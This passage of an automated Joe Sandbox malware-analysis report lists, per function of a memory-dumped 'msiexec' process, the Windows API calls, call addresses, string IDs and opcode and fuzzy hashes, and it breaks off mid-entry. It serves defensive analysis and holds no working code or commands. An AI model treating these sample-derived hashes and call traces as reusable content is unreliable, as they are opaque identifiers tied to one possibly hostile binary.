                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1125800050-0
                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleSleep
                                                                                            • String ID: }A
                                                                                            • API String ID: 252777609-2138825249
                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                            APIs
                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                            • free.MSVCRT ref: 00409A31
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3056473165-0
                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: BINARY
                                                                                            • API String ID: 2221118986-907554435
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /stext
                                                                                            • API String ID: 2081463915-3817206916
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 2445788494-0
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            APIs
                                                                                            Strings
                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                            • API String ID: 2803490479-1168259600
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1065087418-0
                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1381354015-0
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004301AD
                                                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1297977491-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            APIs
                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                            • String ID:
                                                                                            • API String ID: 2154303073-0
                                                                                            APIs
                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 3154509469-0
                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                            APIs
                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4232544981-0
                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                            APIs
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$FileModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 3859505661-0
                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                            APIs
                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumNamesResource
                                                                                            • String ID:
                                                                                            • API String ID: 3334572018-0
                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
